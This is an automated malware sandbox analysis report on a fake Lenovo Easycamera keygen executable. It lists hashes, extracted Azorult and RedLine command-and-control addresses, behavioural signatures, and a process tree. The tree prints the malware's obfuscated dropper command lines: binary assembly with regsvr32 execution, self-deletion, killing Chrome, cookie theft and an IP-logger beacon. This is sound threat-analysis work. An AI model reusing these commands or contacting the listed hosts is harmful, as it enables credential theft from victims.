Analysis

  • max time kernel
    1775s
  • max time network
    1737s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    11-05-2021 23:02

General

  • Target

    Lenovo.Easycamera.6.32.2018.05.key.generator.by.aaocg.exe

  • Size

    6.4MB

  • MD5

    cdeeb6da0244476be71ebf88fa76ecdc

  • SHA1

    f26b35c822187292bc1c31c2e61b2a714daa5334

  • SHA256

    634f7f210c081e0d54fb348a921db874126736503cf7cfcf2f605c484aa6635a

  • SHA512

    149487c0ddf5c847c1e5182a921bc9d527b4bfcb525de1a129bd10c25a8119e7de153eadc6fdb157e95999ae20557aabe872c1b6ae8a8fb1a25bfe25478d30e1

Malware Config

Extracted

  • Family: azorult
  • C2: http://kvaka.li/1210776429.php

Extracted

  • Family: redline
  • Botnet: ServLyla
  • C2: 87.251.71.193:20119

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 47 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, among other data.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
    PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2836
  • C:\Users\Admin\AppData\Local\Temp\Lenovo.Easycamera.6.32.2018.05.key.generator.by.aaocg.exe
    "C:\Users\Admin\AppData\Local\Temp\Lenovo.Easycamera.6.32.2018.05.key.generator.by.aaocg.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1268
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:608
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
            keygen-pr.exe -p83fsase3Ge
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1576
              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                PID:1332
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                    C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
                    5⤵
                    • Executes dropped EXE
                    PID:436
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
            keygen-step-3.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1584
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                4⤵
                PID:1256
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 1.1.1.1 -n 1 -w 3000
                    5⤵
                    • Runs ping.exe
                    PID:1156
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
            keygen-step-5.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:804
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > ..\FDhpFB.exe &&STARt ..\FDhpFB.exe -PpTHlybeBhi_Z2JPlcy& If "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NXE" /f > NuL
                4⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1696
                  • C:\Users\Admin\AppData\Local\Temp\FDhpFB.exe
                    ..\FDhpFB.exe -PpTHlybeBhi_Z2JPlcy
                    5⤵
                    • Executes dropped EXE
                    PID:1376
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\FDhpFB.exe" > ..\FDhpFB.exe &&STARt ..\FDhpFB.exe -PpTHlybeBhi_Z2JPlcy& If "-PpTHlybeBhi_Z2JPlcy" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\FDhpFB.exe" ) do taskkill -IM "%~NXE" /f > NuL
                        6⤵
                        PID:1872
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c eCHO | SET /p = "MZ" > 30EY.gg & COpY /b /y 30EY.gg +Q_FM.YU +H_WJ2.E3 + PJ76k1.o + SZaA.2a0+ 8Td1LZ.82Q + DMgIJ5IH.JC+ 4_xVhVZw.W + hWLEB3.E + BHn249Hz.35 + TRYY00W9.RM+ QBCT.xsG + 2SOkTK.Jx + Y1ws.9T8 + 9Q5AeJ.L + 7VrCZVK.U ..\IZ1SIMY.QE > nUl & sTART regsvr32 ..\iZ1SIMY.qE -u -S & DEl /Q * > Nul
                        6⤵
                        PID:1352
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                            7⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1256
                          • C:\Windows\SysWOW64\regsvr32.exe
                            regsvr32 ..\iZ1SIMY.qE -u -S
                            7⤵
                            • Loads dropped DLL
                            • Suspicious use of NtCreateThreadExHideFromDebugger
                            PID:2132
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>30EY.gg"
                            7⤵
                            PID:1384
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill -IM "keygen-step-5.exe" /f
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1684
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
            keygen-step-1.exe
            3⤵
            • Executes dropped EXE
            PID:800
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
            keygen-step-4.exe
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:320
              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Installer.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Installer.exe"
                4⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                PID:676
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    5⤵
                    PID:2308
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        6⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2336
              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\jg6_6asg.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\jg6_6asg.exe"
                4⤵
                • Executes dropped EXE
                • Modifies system certificate store
                PID:2388
              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\zhangxia.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\zhangxia.exe"
                4⤵
                • Executes dropped EXE
                PID:2716
                  • C:\Windows\SysWOW64\rUNdlL32.eXe
                    "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                    5⤵
                    • Loads dropped DLL
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2792
              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:2812
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                    C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                    5⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3000
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1S5Ca7
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        PID:1700
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1700 CREDAT:275457 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2240
              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\gcttt.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\gcttt.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Modifies system certificate store
                PID:2060
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    PID:1252
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2092
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2568
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2724

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/436-119-0x0000000000400000-0x0000000000983000-memory.dmp (Filesize 5.5MB)
  • memory/888-184-0x00000000008B0000-0x00000000008FB000-memory.dmp (Filesize 300KB)
  • memory/888-185-0x0000000001340000-0x00000000013B0000-memory.dmp (Filesize 448KB)
  • memory/1268-60-0x0000000075591000-0x0000000075593000-memory.dmp (Filesize 8KB)
  • memory/1332-125-0x0000000002390000-0x000000000252C000-memory.dmp (Filesize 1.6MB)
  • memory/2132-165-0x0000000000440000-0x00000000004E2000-memory.dmp (Filesize 648KB)
  • memory/2132-153-0x0000000010000000-0x000000001018A000-memory.dmp (Filesize 1.5MB)
  • memory/2132-166-0x0000000000650000-0x00000000006DF000-memory.dmp (Filesize 572KB)
  • memory/2132-152-0x00000000021C0000-0x000000000234A000-memory.dmp (Filesize 1.5MB)
  • memory/2388-164-0x0000000000400000-0x000000000056D000-memory.dmp (Filesize 1.4MB)
  • memory/2792-182-0x00000000008F0000-0x00000000009F1000-memory.dmp (Filesize 1.0MB)
  • memory/2792-183-0x00000000001D0000-0x000000000022C000-memory.dmp (Filesize 368KB)
  • memory/2792-181-0x0000000010000000-0x0000000010002000-memory.dmp (Filesize 8KB)
  • memory/2812-179-0x0000000001060000-0x0000000001061000-memory.dmp (Filesize 4KB)
  • memory/2812-188-0x0000000007280000-0x0000000007281000-memory.dmp (Filesize 4KB)
  • memory/2812-190-0x00000000007B0000-0x00000000007CC000-memory.dmp (Filesize 112KB)
  • memory/2836-189-0x0000000002CF0000-0x0000000002DF5000-memory.dmp (Filesize 1.0MB)
  • memory/2836-187-0x0000000000490000-0x0000000000500000-memory.dmp (Filesize 448KB)
  • memory/3000-200-0x0000000000590000-0x0000000000591000-memory.dmp (Filesize 4KB)
  • memory/3000-194-0x0000000000400000-0x000000000041C000-memory.dmp (Filesize 112KB)
  • memory/3000-191-0x0000000000400000-0x000000000041C000-memory.dmp (Filesize 112KB)